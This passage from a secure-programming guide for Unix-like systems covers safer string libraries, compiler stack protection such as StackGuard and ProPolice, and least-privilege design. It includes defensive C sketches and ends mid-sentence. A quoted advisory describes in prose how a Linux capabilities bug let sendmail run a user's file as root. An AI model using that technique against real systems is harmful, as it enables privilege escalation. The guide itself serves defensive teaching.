length of the source and destination arguments. Sanity checking the input and
the resulting intermediate computation might deal with this, too.
Another alternative is to dynamically reallocate all strings instead of using
fixed-size buffers. This general approach is recommended by the GNU
programming guidelines, since it permits programs to handle arbitrarily-sized
inputs (until they run out of memory). Of course, the major problem with
dynamically allocated strings is that you may run out of memory. The memory
may even be exhausted at some other point in the program than the portion
where you're worried about buffer overflows; any memory allocation can fail.
Also, since dynamic reallocation may cause memory to be inefficiently
allocated, it is entirely possible to run out of memory even though
technically there is enough virtual memory available to the program to
continue. In addition, before running out of memory the program will probably
use a great deal of virtual memory; this can easily result in ``thrashing'',
a situation in which the computer spends all its time just shuttling
information between the disk and memory (instead of doing useful work). This
can have the effect of a denial of service attack. Some rational limits on
input size can help here. In general, the program must be designed to fail
safely when memory is exhausted if you use dynamically allocated strings.
-----------------------------------------------------------------------------
6.2.3. strlcpy and strlcat
An alternative, being employed by OpenBSD, is the strlcpy(3) and strlcat(3)
functions by Miller and de Raadt [Miller 1999]. This is a minimalist,
statically-sized buffer approach that provides C string copying and
concatenation with a different (and less error-prone) interface. Source and
documentation of these functions are available under a newer BSD-style open
source license at [ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/
strlcpy.3] ftp://ftp.openbsd.org/pub/OpenBSD/src/lib/libc/string/strlcpy.3.
First, here are their prototypes:
+---------------------------------------------------------------------------+
|size_t strlcpy (char *dst, const char *src, size_t size); |
|size_t strlcat (char *dst, const char *src, size_t size); |
+---------------------------------------------------------------------------+
Both strlcpy and strlcat take the full size of the destination buffer as a
parameter (not the maximum number of characters to be copied) and guarantee
to NIL-terminate the result (as long as size is larger than 0). Remember that
you should include a byte for NIL in the size.
The strlcpy function copies up to size-1 characters from the NUL-terminated
string src to dst, NIL-terminating the result. The strlcat function appends
the NIL-terminated string src to the end of dst. It will append at most size
- strlen(dst) - 1 bytes, NIL-terminating the result.
One minor disadvantage of strlcpy(3) and strlcat(3) is that they are not, by
default, installed in most Unix-like systems. In OpenBSD, they are part of
<string.h>. This is not that difficult a problem; since they are small
functions, you can even include them in your own program's source (at least
as an option), and create a small separate package to load them. You can even
use autoconf to handle this case automatically. If more programs use these
functions, it won't be long before these are standard parts of Linux
distributions and other Unix-like systems. Also, these functions have been
recently added to the ``glib'' library (I submitted the patch to do this), so
using recent versions of glib makes them available. In glib these functions
are named g_strlcpy and g_strlcat (not strlcpy or strlcat) to be consistent
with the glib library naming conventions.
Also, strlcat(3) has slightly varying semantics when the provided size is 0
or if there are no NIL characters in the destination string dst (inside the
given number of characters). In OpenBSD, if the size is 0, then the
destination string's length is considered 0. Also, if size is nonzero, but
there are no NIL characters in the destination string (in the size number of
characters), then the length of the destination is considered equal to the
size. These rules make handling strings without embedded NILs consistent.
Unfortunately, at least Solaris doesn't (at this time) obey these rules,
because they weren't specified in the original documentation. I've talked to
Todd Miller, and he and I agree that the OpenBSD semantics are the correct
ones (and that Solaris is incorrect). The reasoning is simple: under no
condition should strlcat or strlcpy ever examine characters in the
destination outside of the range of size; such access might cause core dumps
(from accessing out-of-range memory) and even hardware interactions (through
memory-mapped I/O). Thus, given:
+---------------------------------------------------------------------------+
| a = strlcat ("Y", "123", 0); |
+---------------------------------------------------------------------------+
The correct answer is 3 (0+3=3), but Solaris will claim the answer is 4
because it incorrectly looks at characters beyond the "size" length in the
destination. For now, I suggest avoiding cases where the size is 0 or the
destination has no NIL characters. Future versions of glib will hide this
difference and always use the OpenBSD semantics.
-----------------------------------------------------------------------------
6.2.4. libmib
One toolset for C that dynamically reallocates strings automatically is the
``libmib allocated string functions'' by Forrest J. Cavalier III, available
at [http://www.mibsoftware.com/libmib/astring] http://www.mibsoftware.com/
libmib/astring. There are two variations of libmib; ``libmib-open'' appears
to be clearly open source under its own X11-like license that permits
modification and redistribution (though redistributions must choose a
different name); however, the developer states that it ``may not be fully
tested.'' To continuously get libmib-mature, you must pay for a subscription.
The documentation is not open source, but it is freely available.
-----------------------------------------------------------------------------
6.2.5. C++ std::string class
C++ developers can use the std::string class, which is built into the
language. This is a dynamic approach, as the storage grows as necessary.
However, it's important to note that if that class's data is turned into a
``char *'' (e.g., by using data() or c_str()), the possibilities of buffer
overflow resurface, so you need to be careful when using such methods.
Note that c_str() always returns a NIL-terminated string, but data() may or
may not (it's implementation dependent, and most implementations do not
include the NIL terminator). Avoid using data(), and if you must use it,
don't be dependent on its format.
Many C++ developers use other string libraries as well, such as those that
come with other large libraries or even home-grown string libraries. With
those libraries, be especially careful - many alternative C++ string classes
include routines to automatically convert the class to a ``char *'' type. As
a result, they can silently introduce buffer overflow vulnerabilities.
-----------------------------------------------------------------------------
6.2.6. Libsafe
Arash Baratloo, Timothy Tsai, and Navjot Singh (of Lucent Technologies) have
developed Libsafe, a wrapper of several library functions known to be
vulnerable to stack smashing attacks. This wrapper (which they call a kind of
``middleware'') is a simple dynamically loaded library that contains modified
versions of C library functions such as strcpy(3). These modified versions
implement the original functionality, but in a manner that ensures that any
buffer overflows are contained within the current stack frame. Their initial
performance analysis suggests that this library's overhead is very small.
Libsafe papers and source code are available at [http://
www.research.avayalabs.com/project/libsafe] http://www.research.avayalabs.com
/project/libsafe. The Libsafe source code is available under the completely
open source LGPL license.
Libsafe's approach appears somewhat useful. Libsafe should certainly be
considered for inclusion by Linux distributors, and its approach is worth
considering by others as well. For example, I know that the Mandrake
distribution of Linux (version 7.1) includes it. However, from a software
developer's perspective, Libsafe is a useful defense-in-depth mechanism, but
it does not really prevent buffer overflows. Here are several reasons why you
shouldn't depend just on Libsafe during code development:
  * Libsafe only protects a small set of known functions with obvious buffer
overflow issues. At the time of this writing, this list is significantly
shorter than the list of functions in this book known to have this
problem. It also won't protect against code you write yourself (e.g., in
a while loop) that causes buffer overflows.
  * Even if libsafe is installed in a distribution, the way it is installed
impacts its use. The documentation recommends setting LD_PRELOAD to cause
libsafe's protections to be enabled, but the problem is that users can
unset this environment variable... causing the protection to be disabled
for programs they execute!
  * Libsafe only protects against buffer overflows of the stack onto the
return address; you can still overrun the heap or other variables in that
procedure's frame.
  * Unless you can be assured that all deployed platforms will use libsafe
(or something like it), you'll have to protect your program as though it
wasn't there.
  * LibSafe seems to assume that saved frame pointers are at the beginning of
each stack frame. This isn't always true. Compilers (such as gcc) can
optimize away things, and in particular the option "-fomit-frame-pointer"
removes the information that libsafe seems to need. Thus, libsafe may
fail to work for some programs.
The libsafe developers themselves acknowledge that software developers
shouldn't just depend on libsafe. In their words:
It is generally accepted that the best solution to buffer overflow
attacks is to fix the defective programs. However, fixing defective
programs requires knowing that a particular program is defective. The
true benefit of using libsafe and other alternative security measures is
protection against future attacks on programs that are not yet known to
be vulnerable.
-----------------------------------------------------------------------------
6.2.7. Other Libraries
The glib (not glibc) library is a widely-available open source library that
provides a number of useful functions for C programmers. GTK+ and GNOME both
use glib, for example. As I noted earlier, in glib version 1.3.2, g_strlcpy()
and g_strlcat() have been added through a patch which I submitted. This
should make it easier to portably use those functions once these later
versions of glib become widely available. At this time I do not have an
analysis showing definitively that the glib library functions protect against
buffer overflows. However, many of the glib functions automatically allocate
memory, and on allocation failure those functions abort with no reasonable way
to intercept the failure (e.g., to try something else instead). As a result,
many glib functions cannot be used in most secure programs. The
GNOME guidelines recommend using functions such as g_strdup_printf(), which
is fine as long as it's okay if your program immediately crashes if an
out-of-memory condition occurs. However, if you can't accept this, then using
such routines isn't appropriate.
-----------------------------------------------------------------------------
6.3. Compilation Solutions in C/C++
A completely different approach is to use compilation methods that perform
bounds-checking (see [Sitaker 1999] for a list). In my opinion, such tools
are very useful in having multiple layers of defense, but it's not wise to
use this technique as your sole defense. There are at least two reasons for
this. First of all, such tools generally only provide a partial defense
against buffer overflows (and the ``complete'' defenses are generally 12-30
times slower); C and C++ were simply not designed to protect against buffer
overflows. Second of all, for open source programs you cannot be certain what
tools will be used to compile the program; using the default ``normal''
compiler for a given system might suddenly open security flaws.
One of the more useful tools is ``StackGuard'', a modification of the
standard GNU C compiler gcc. StackGuard works by inserting a ``guard'' value
(called a ``canary'') in front of the return address; if a buffer overflow
overwrites the return address, the canary's value (hopefully) changes and the
system detects this before using it. This is quite valuable, but note that
this does not protect against buffer overflows overwriting other values
(which they may still be able to use to attack a system). There is work to
extend StackGuard to be able to add canaries to other data items, called
``PointGuard''. PointGuard will automatically protect certain values (e.g.,
function pointers and longjump buffers). However, protecting other variable
types using PointGuard requires specific programmer intervention (the
programmer has to identify which data values must be protected with
canaries). This can be valuable, but it's easy to accidentally omit
protection for a data value you didn't think needed protection - but needs it
anyway. More information on StackGuard, PointGuard, and other alternatives is
in Cowan [1999].
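To illustrate the canary idea, here is a simplified sketch in plain C (the
constant and layout are invented for illustration; real StackGuard plants the
canary next to the saved return address, and the check is generated by the
compiler rather than written by hand):

```c
#include <string.h>

/* Simplified illustration of a ``canary'': a guard value is placed just
 * past a fixed-size buffer and re-checked after a copy.  If an unchecked
 * copy overran the buffer, the guard no longer matches. */
#define CANARY_VALUE 0xDEADBEEFUL
#define BUF_SIZE 16

int canary_survives(const char *src) {
    unsigned char frame[BUF_SIZE + sizeof(unsigned long)];
    unsigned long canary = CANARY_VALUE;
    memcpy(frame + BUF_SIZE, &canary, sizeof canary); /* plant the guard */

    size_t n = strlen(src) + 1;    /* an unchecked copy may overrun BUF_SIZE */
    if (n > sizeof frame) n = sizeof frame;  /* stay within defined behavior */
    memcpy(frame, src, n);

    memcpy(&canary, frame + BUF_SIZE, sizeof canary); /* re-read the guard */
    return canary == CANARY_VALUE; /* 0 means the buffer was overrun */
}
```

A short input leaves the guard intact (returns 1); an input longer than 16
bytes tramples it (returns 0), which is exactly the change StackGuard detects
before the function returns.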
IBM has developed a stack protection system called ProPolice based on the
ideas of StackGuard. IBM doesn't use the name ProPolice on its current website
- there it's just called a "GCC extension for protecting applications from
stack-smashing attacks." Like StackGuard, ProPolice is a GCC (Gnu Compiler
Collection) extension for protecting applications from stack-smashing
attacks. Applications written in C are protected by automatically inserting
protection code into an application at compilation time. ProPolice is
slightly different than StackGuard, however, by adding three features: (1)
reordering local variables to place buffers after pointers (to avoid the
corruption of pointers that could be used to further corrupt arbitrary memory
locations), (2) copying pointers in function arguments to an area preceding
local variable buffers (to prevent the corruption of pointers that could be
used to further corrupt arbitrary memory locations), and (3) omitting
instrumentation code from some functions (it basically assumes that only
character arrays are dangerous; while this isn't strictly true, it's mostly
true, and as a result ProPolice has better performance while retaining most
of its protective capabilities). The IBM website includes information for how
to build Red Hat Linux and FreeBSD with this protection; OpenBSD has already
added ProPolice to their base system. I think this is extremely promising,
and I hope to see this capability included in future versions of gcc and used
in various distributions. In fact, I think this kind of capability should be
the default - this would mean that the largest single class of attacks would
no longer enable attackers to take control in most cases.
As a related issue, in Linux you could modify the Linux kernel so that the
stack segment is not executable; such a patch to Linux does exist (see Solar
Designer's patch, which includes this, at [http://www.openwall.com/linux/]
http://www.openwall.com/linux/). However, as of this writing this is not built
into the Linux kernel. Part of the rationale is that this is less protection
than it seems; attackers can simply force the system to call other
``interesting'' locations already in the program (e.g., in its library, the
heap, or static data segments). Also, sometimes Linux does require executable
code in the stack, e.g., to implement signals and to implement GCC
``trampolines''. Solar Designer's patch does handle these cases, but this
does complicate the patch. Personally, I'd like to see this merged into the
main Linux distribution, since it does make attacks somewhat more difficult
and it defends against a range of existing attacks. However, I agree with
Linus Torvalds and others that this does not add the amount of protection it
would appear to and can be circumvented with relative ease. You can read
Linus Torvalds' explanation for not including this support at [http://
old.lwn.net/1998/0806/a/linus-noexec.html] http://old.lwn.net/1998/0806/a/
linus-noexec.html.
In short, it's better to work first on developing a correct program that
defends itself against buffer overflows. Then, after you've done this, by all
means use techniques and tools like StackGuard as an additional safety net.
If you've worked hard to eliminate buffer overflows in the code itself, then
StackGuard (and tools like it) are likely to be more effective because
there will be fewer ``chinks in the armor'' that StackGuard will be called on
to protect.
-----------------------------------------------------------------------------
6.4. Other Languages
The problem of buffer overflows is an excellent argument for using other
programming languages such as Perl, Python, Java, and Ada95. After all,
nearly all other programming languages used today (other than assembly
language) protect against buffer overflows. Using those other languages does
not eliminate all problems, of course; in particular see the discussion in
Section 8.3 regarding the NIL character. There is also the problem of
ensuring that those other languages' infrastructure (e.g., run-time library)
is available and secured. Still, you should certainly consider using other
programming languages when developing secure programs to protect against
buffer overflows.
-----------------------------------------------------------------------------
Chapter 7. Structure Program Internals and Approach
  Like a city whose walls are broken
down is a man who lacks self-control.
  Proverbs 25:28 (NIV)
-----------------------------------------------------------------------------
7.1. Follow Good Software Engineering Principles for Secure Programs
Saltzer [1974] and later Saltzer and Schroeder [1975] list the following
principles of the design of secure protection systems, which are still valid:
  * Least privilege. Each user and program should operate using the fewest
privileges possible. This principle limits the damage from an accident,
error, or attack. It also reduces the number of potential interactions
among privileged programs, so unintentional, unwanted, or improper uses
of privilege are less likely to occur. This idea can be extended to the
internals of a program: only the smallest portion of the program which
needs those privileges should have them. See Section 7.4 for more about
how to do this.
  * Economy of mechanism/Simplicity. The protection system's design should be
as simple and small as possible. In their words, ``techniques such as
line-by-line inspection of software and physical examination of hardware
that implements protection mechanisms are necessary. For such techniques
to be successful, a small and simple design is essential.'' This is
sometimes described as the ``KISS'' principle (``keep it simple,
stupid'').
  * Open design. The protection mechanism must not depend on attacker
ignorance. Instead, the mechanism should be public, depending on the
secrecy of relatively few (and easily changeable) items like passwords or
private keys. An open design makes extensive public scrutiny possible,
and it also makes it possible for users to convince themselves that the
system about to be used is adequate. Frankly, it isn't realistic to try
to maintain secrecy for a system that is widely distributed; decompilers
and subverted hardware can quickly expose any ``secrets'' in an
implementation. Bruce Schneier argues that smart engineers should
``demand open source code for anything related to security'', as well as
ensuring that it receives widespread review and that any identified
problems are fixed [Schneier 1999].
  * Complete mediation. Every access attempt must be checked; position the
mechanism so it cannot be subverted. For example, in a client-server
model, generally the server must do all access checking because users can
build or modify their own clients. This is the point of all of Chapter 5,
as well as Section 7.2.
  * Fail-safe defaults (e.g., permission-based approach). The default should
be denial of service, and the protection scheme should then identify
conditions under which access is permitted. See Section 7.7 and Section
7.9 for more.
  * Separation of privilege. Ideally, access to objects should depend on more
than one condition, so that defeating one protection system won't enable
complete access.
  * Least common mechanism. Minimize the amount and use of shared mechanisms
(e.g. use of the /tmp or /var/tmp directories). Shared objects provide
potentially dangerous channels for information flow and unintended
interactions. See Section 7.10 for more information.
  * Psychological acceptability / Easy to use. The human interface must be
designed for ease of use so users will routinely and automatically use
the protection mechanisms correctly. Mistakes will be reduced if the
security mechanisms closely match the user's mental image of his or her
protection goals.
A good overview of various design principles for security is available in
Peter Neumann's [http://www.csl.sri.com/users/neumann/chats.html#4]
Principled Assuredly Trustworthy Composable Architectures.
-----------------------------------------------------------------------------
7.2. Secure the Interface
Interfaces should be minimal (simple as possible), narrow (provide only the
functions needed), and non-bypassable. Trust should be minimized. Consider
limiting the data that the user can see.
-----------------------------------------------------------------------------
7.3. Separate Data and Control
Any files you support should be designed to completely separate (passive)
data from programs that are executed. Applications and data viewers may be
used to display files developed externally, so in general don't allow them to
accept programs (also known as ``scripts'' or ``macros''). The most dangerous
kind is an auto-executing macro that executes when the application is loaded
and/or when the data is initially displayed; from a security point-of-view
this is generally a disaster waiting to happen.
If you truly must support programs downloaded remotely (e.g., to implement an
existing standard), make sure that you have extremely strong control over
what the macro can do (this is often called a ``sandbox''). Past experience
has shown that real sandboxes are hard to implement correctly. In fact, I
can't remember a single widely-used sandbox that hasn't been repeatedly
exploited (yes, that includes Java). If possible, at least have the programs
stored in a separate file, so that it's easier to block them out when another
sandbox flaw has been found but not yet fixed. Storing them separately also
makes it easier to reuse code and to cache it when helpful.
-----------------------------------------------------------------------------
7.4. Minimize Privileges
As noted earlier, it is an important general principle that a program should
have the minimal privileges necessary to do its job (this is termed ``least
privilege''). That way, if the program is broken, the damage is limited. The
most extreme example is to simply not write a secure program at all - if this
can be done, it usually should be. For example, don't make your program
setuid or setgid if you can; just make it an ordinary program, and require
the administrator to log in as such before running it.
In Linux and Unix, the primary determiner of a process' privileges is the set
of id's associated with it: each process has a real, effective and saved id
for both the user and group (a few very old Unixes don't have a ``saved''
id). Linux also has, as a special extension, a separate filesystem UID and
GID for each process. Manipulating these values is critical to keeping
privileges minimized, and there are several ways to minimize them (discussed
below). You can also use chroot(2) to minimize the files visible to a
program, though chroot() can be difficult to use correctly. There are a
few other values determining privilege in Linux and Unix, for example, POSIX
capabilities (supported by Linux 2.2 and greater, and by some other Unix-like
systems).
-----------------------------------------------------------------------------
7.4.1. Minimize the Privileges Granted
Perhaps the most effective technique is to simply minimize the highest
privilege granted. In particular, avoid granting a program root privilege if
possible. Don't make a program setuid root if it only needs access to a small
set of files; consider creating separate user or group accounts for different
functions.
A common technique is to create a special group, change a file's group
ownership to that group, and then make the program setgid to that group. It's
better to make a program setgid instead of setuid where you can, since group
membership grants fewer rights (in particular, it does not grant the right to
change file permissions).
This is commonly done for game high scores: games are usually setgid to the
group games, the score files are owned by that group, and the programs themselves and
their configuration files are owned by someone else (say root). Thus,
breaking into a game allows the perpetrator to change high scores but doesn't
grant the privilege to change the game's executable or configuration file.
The latter is important; if an attacker could change a game's executable or
its configuration files (which might control what the executable runs), then
they might be able to gain control of a user who ran the game.
If creating a new group isn't sufficient, consider creating a new pseudouser
(really, a special role) to manage a set of resources - often a new
pseudogroup (again, a special role) is also created just to run a program.
Web servers typically do this; often web servers are set up with a special
user (``nobody'') so that they can be isolated from other users. Indeed, web
servers are instructive here: web servers typically need root privileges to
start up (so they can attach to port 80), but once started they usually shed
all their privileges and run as the user ``nobody''. However, don't use the
``nobody'' account (unless you're writing a webserver); instead, create your
own pseudouser or new group. The purpose of this approach is to isolate
different programs, processes, and data from each other, by exploiting the
operating system's ability to keep users and groups separate. If different
programs shared the same account, then breaking into one program would also
grant privileges to the other. Usually the pseudouser should not own the
programs it runs; that way, an attacker who breaks into the account cannot
change the program it runs. By isolating different parts of the system into
running separate users and groups, breaking one part will not necessarily
break the whole system's security.
If you're using a database system (say, by calling its query interface),
limit the rights of the database user that the application uses. For example,
don't give that user access to all of the system stored procedures if that
user only needs access to a handful of user-defined ones. Do everything you
can inside stored procedures. That way, even if someone does manage to force
arbitrary strings into the query, the damage that can be done is limited. If
you must directly pass a regular SQL query with client supplied data (and you
usually shouldn't), wrap it in something that limits its activities (e.g.,
sp_sqlexec). (My thanks to SPI Labs for these database system suggestions).
If you must give a program privileges usually reserved for root, consider
using POSIX capabilities, so that as soon as possible your program can
minimize the privileges available to it. POSIX capabilities are available in Linux 2.2 and
in many other Unix-like systems. By calling cap_set_proc(3) or the
Linux-specific capsetp(3) routines immediately after starting, you can
permanently reduce the abilities of your program to just those abilities it
actually needs. For example the network time daemon (ntpd) traditionally has
run as root, because it needs to modify the current time. However, patches
have been developed so ntpd only needs a single capability, CAP_SYS_TIME, so
even if an attacker gains control over ntpd it's somewhat more difficult to
exploit the program.
I say ``somewhat more difficult'' because, unless other steps are taken, retaining a
privilege using POSIX capabilities requires that the process continue to have
the root user id. Because many important files (configuration files,
binaries, and so on) are owned by root, an attacker controlling a program
with such limited capabilities can still modify key system files and gain
full root-level privilege. A Linux kernel extension (available in versions
2.4.X and 2.2.19+) provides a better way to limit the available privileges: a
program can start as root (with all POSIX capabilities), prune its
capabilities down to just what it needs, call prctl(PR_SET_KEEPCAPS,1), and
then use setuid() to change to a non-root process. The PR_SET_KEEPCAPS
setting marks a process so that when a process does a setuid to a nonzero
value, the capabilities aren't cleared (normally they are cleared). This
process setting is cleared on exec(). However, note that PR_SET_KEEPCAPS is a
Linux-unique extension for newer versions of the Linux kernel.
One tool you can use to simplify minimizing granted privileges is the
``compartment'' tool developed by SuSE. This tool, which only works on Linux,
sets the filesystem root, uid, gid, and/or the capability set, then runs the
given program. This is particularly handy for running some other program
without modifying it. Here's the syntax of version 0.5:
+---------------------------------------------------------------------------+
|Syntax: compartment [options] /full/path/to/program |
| |
|Options: |
| --chroot path chroot to path |
| --user user change UID to this user |
| --group group change GID to this group |
| --init program execute this program before doing anything |
| --cap capset set capset name. You can specify several |
| --verbose be verbose |
| --quiet do no logging (to syslog) |
+---------------------------------------------------------------------------+
Thus, you could start a more secure anonymous ftp server using:
+---------------------------------------------------------------------------+
| compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd |
+---------------------------------------------------------------------------+
At the time of this writing, the tool is immature and not available on
typical Linux distributions, but this may quickly change. You can download
the program via [http://www.suse.de/~marc] http://www.suse.de/~marc. A
similar tool is dreamland; you can find it at [http://www.7ka.mipt.ru/~szh/
dreamland] http://www.7ka.mipt.ru/~szh/dreamland.
Note that not all Unix-like systems implement POSIX capabilities, and
PR_SET_KEEPCAPS is currently a Linux-only extension. Thus, these approaches
limit portability. However, if you use them merely as an optional safeguard
where available, this approach will not really limit
portability. Also, while the Linux kernel version 2.2 and greater includes
the low-level calls, the C-level libraries to make their use easy are not
installed on some Linux distributions, slightly complicating their use in
applications. For more information on Linux's implementation of POSIX
capabilities, see [http://linux.kernel.org/pub/linux/libs/security/
linux-privs] http://linux.kernel.org/pub/linux/libs/security/linux-privs.
FreeBSD has the jail() function for limiting privileges; see the jail
documentation for more information. There are a number of specialized tools
and extensions for limiting privileges; see Section 3.10.
-----------------------------------------------------------------------------
7.4.2. Minimize the Time the Privilege Can Be Used
As soon as possible, permanently give up privileges. Some Unix-like systems,
including Linux, implement ``saved'' IDs which store the ``previous'' value.
The simplest approach is to reset any supplemental groups if appropriate
(e.g., using setgroups(2)), and then set the other id's twice to an untrusted
id. In setuid/setgid programs, you should usually set the effective gid and
uid to the real ones, in particular right after a fork(2), unless there's a
good reason not to. Note that you have to change the gid first when dropping
from root to another privilege or it won't work - once you drop root
privileges, you won't be able to change much else. Note that in some systems,
just setting the group isn't enough, if the process belongs to supplemental
groups with privileges. For example, the ``rsync'' program didn't remove the
supplementary groups when it changed its uid and gid, which created a
potential exploit.
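Here is a sketch of this order of operations (the function name is mine;
return-value checks are included on every call because, as the rsync and
sendmail incidents show, you should never assume the set*id() calls worked):

```c
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently drop root privileges in the order the text requires:
 * supplementary groups first, then the gid, then the uid.  Doing the
 * uid last matters - once the uid is no longer 0, setgroups() and
 * setgid() would fail with EPERM. */
int drop_privileges_permanently(uid_t uid, gid_t gid) {
    if (geteuid() == 0) {
        /* Only root may call setgroups(); clear the supplementary list. */
        if (setgroups(0, NULL) != 0) return -1;
    }
    if (setgid(gid) != 0) return -1;   /* group first... */
    if (setuid(uid) != 0) return -1;   /* ...uid last */

    /* Verify: real and effective ids must now match the target. */
    if (getuid() != uid || geteuid() != uid) return -1;
    if (getgid() != gid || getegid() != gid) return -1;
    return 0;
}
```

On systems with saved IDs, setuid() called by a root process sets all three
uid values, making the drop permanent; that is the behavior this sketch
relies on.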
It's worth noting that there's a well-known related bug that uses POSIX
capabilities to interfere with this minimization. This bug affects Linux
kernel 2.2.0 through 2.2.15, and possibly a number of other Unix-like systems
with POSIX capabilities. See Bugtraq id 1322 on http://www.securityfocus.com
for more information. Here is their summary:
POSIX "Capabilities" have recently been implemented in the Linux kernel.
These "Capabilities" are an additional form of privilege control to
enable more specific control over what privileged processes can do.
Capabilities are implemented as three (fairly large) bitfields, with
each bit representing a specific action a privileged process can perform.
By setting specific bits, the actions of privileged processes can be
controlled -- access can be granted for various functions only to the
specific parts of a program that require them. It is a security measure.
The problem is that capabilities are copied across fork() and exec() calls, meaning
that if capabilities are modified by a parent process, they can be
carried over. The way that this can be exploited is by setting all of the
capabilities to zero (meaning, all of the bits are off) in each of the
three bitfields and then executing a setuid program that attempts to drop
privileges before executing code that could be dangerous if run as root,
such as what sendmail does. When sendmail attempts to drop privileges
using setuid(getuid()), it fails, not having the capabilities required to
do so in its bitfields, and with no checks on its return value it
continues executing with superuser privileges, and can run a user's
.forward file as root, leading to a complete compromise.
One approach, used by sendmail, is to attempt to do setuid(0) after a setuid
(getuid()); normally this should fail. If it succeeds, the program should
stop. For more information, see http://sendmail.net/?feed=000607linuxbug. In
the short term this might be a good idea in other programs, though clearly
the better long-term approach is to upgrade the underlying system.
-----------------------------------------------------------------------------
7.4.3. Minimize the Time the Privilege is Active
Use setuid(2), seteuid(2), setgroups(2), and related functions to ensure that
the program only has these privileges active when necessary, and then
temporarily deactivate the privilege when it's not in use. As noted above,
you might want to ensure that these privileges are disabled while parsing
user input, but more generally, only turn on privileges when they're actually
needed.
Note that some buffer overflow attacks, if successful, can force a program to
run arbitrary code, and that code could re-enable privileges that were
temporarily dropped. Thus, there are many attacks that temporarily
deactivating a privilege won't counter - it's always much better to
completely drop privileges as soon as possible. There are many papers that
describe how to do this, such as "Designing Shellcode Demystified". Some
people even claim that ``seteuid() [is] considered harmful'' because of the
many attacks it doesn't counter. Still, temporarily deactivating these
permissions prevents a whole class of attacks, such as techniques to convince
a program to write into a file that perhaps it didn't intend to write into.
Since this technique prevents many attacks, it's worth doing if permanently
dropping the privilege can't be done at that point in the program.
-----------------------------------------------------------------------------
7.4.4. Minimize the Modules Granted the Privilege
If only a few modules are granted the privilege, then it's much easier to
determine if they're secure. One way to do so is to have a single module use
the privilege and then drop it, so that other modules called later cannot
misuse the privilege. Another approach is to have separate commands in
separate executables; one command might be a complex tool that can do a vast
number of tasks for a privileged user (e.g., root), while the other tool is
setuid but is a small, simple tool that only permits a small command subset
(and does not trust its invoker). The small, simple tool checks to see if the
input meets various criteria for acceptability, and then if it determines the
input is acceptable, it passes the data on to the complex tool. Note that the
small, simple tool must do a thorough job checking its inputs and limiting
what it will pass along to the complex tool, or this can be a vulnerability.
The communication could be via shell invocation, or any IPC mechanism. These
approaches can even be layered several ways, for example, a complex user tool
could call a simple setuid ``wrapping'' program (that checks its inputs for
secure values) that then passes on information to another complex trusted
tool.
This approach is the normal approach for developing GUI-based applications
which require privilege, but must be run by unprivileged users. The GUI
portion is run as a normal unprivileged user process; that process then
passes security-relevant requests on to another process that has the special
privileges (and does not trust the first process, but instead limits the
requests to whatever the user is allowed to do). Never develop a program that
is privileged (e.g., using setuid) and also directly invokes a graphical
toolkit: Graphical toolkits aren't designed to be used this way, and it would
be extremely difficult to audit graphical toolkits in a way to make this
possible. Fundamentally, graphical toolkits must be large, and it's extremely
unwise to place so much faith in the perfection of that much code, so there
is no point in trying to make them do what should never be done. Feel free to
create a small setuid program that invokes two separate programs: one without
privileges (but with the graphical interface), and one with privileges (and
without an external interface). Or, create a small setuid program that can be
invoked by the unprivileged GUI application. But never combine the two into a
single process. For more about this, see the statement by Owen Taylor about
GTK and setuid, discussing why GTK_MODULES is not a security hole.
Some applications can be best developed by dividing the problem into smaller,
mutually untrusting programs. A simple way is to divide the problem into
separate programs that do one thing (securely), using the filesystem and
locking to prevent problems between them. If more complex interactions are
needed, one approach is to fork into multiple processes, each of which has
different privilege. Communications channels can be set up in a variety of
ways; one way is to have a "master" process create communication channels
(say unnamed pipes or unnamed sockets), then fork into different processes
and have each process drop as many privileges as possible. If you're doing
this, be sure to watch for deadlocks. Then use a simple protocol to allow the
less trusted processes to request actions from the more trusted process(es),
and ensure that the more trusted processes only support a limited set of
requests. Setting user and group permissions so that no one else can even
start up the sub-programs makes it harder to break into.
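Here is a sketch of this master/worker pattern using an unnamed socket pair
(the one-byte ``protocol'' - command 'T', answer 'Y' or 'N' - is invented for
illustration; a real design would define a small, explicit request set, and
the worker would also drop its uid/gid right after the fork):

```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* The master creates a socketpair, forks a less trusted worker, and
 * answers only one kind of request from it. */
int privilege_separated_query(char cmd, char *answer) {
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return -1;

    pid_t pid = fork();
    if (pid < 0) return -1;

    if (pid == 0) {                   /* child: the less trusted worker */
        close(sv[0]);
        /* ...drop privileges here (setgroups/setgid/setuid)... */
        write(sv[1], &cmd, 1);        /* request an action */
        char resp = '?';
        read(sv[1], &resp, 1);
        _exit(resp == 'Y' ? 0 : 1);
    }

    close(sv[1]);                     /* parent: the trusted side */
    char req = 0;
    if (read(sv[0], &req, 1) == 1) {
        char resp = (req == 'T') ? 'Y' : 'N';  /* only one request allowed */
        write(sv[0], &resp, 1);
    }
    close(sv[0]);
    int status = 0;
    waitpid(pid, &status, 0);
    *answer = (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 'Y' : 'N';
    return 0;
}
```

Note the trusted side validates the request and refuses anything outside its
small set; with only one byte in each direction there is no deadlock risk,
but longer exchanges need the care mentioned above.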
Some operating systems have the concept of multiple layers of trust in a
single process, e.g., Multics' rings. Standard Unix and Linux don't have a
way of separating multiple levels of trust by function inside a single
process like this; a call to the kernel increases privileges, but otherwise a
given process has a single level of trust. This is one area where
technologies like Java 2, C# (which copies Java's approach), and Fluke (the
basis of security-enhanced Linux) have an advantage. For example, Java 2 can
specify fine-grained permissions such as the permission to only open a
specific file. However, general-purpose operating systems do not typically
have such abilities at this time; this may change in the near future. For
more about Java, see Section 10.6.
-----------------------------------------------------------------------------
7.4.5. Consider Using FSUID To Limit Privileges
Each Linux process has two Linux-unique state values called filesystem user
id (FSUID) and filesystem group id (FSGID). These values are used when
checking against the filesystem permissions. If you're building a program
that operates as a file server for arbitrary users (like an NFS server), you
might consider using these Linux extensions. To use them, while holding root
privileges change just FSUID and FSGID before accessing files on behalf of a
normal user. This extension is fairly useful, and provides a mechanism for
limiting filesystem access rights without removing other (possibly necessary)
rights. By only setting the FSUID (and not the EUID), a local user cannot
send a signal to the process. Also, avoiding race conditions is much easier
in this situation. However, a disadvantage of this approach is that these
calls are not portable to other Unix-like systems.
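A sketch of the FSUID technique (the function name is mine; note that
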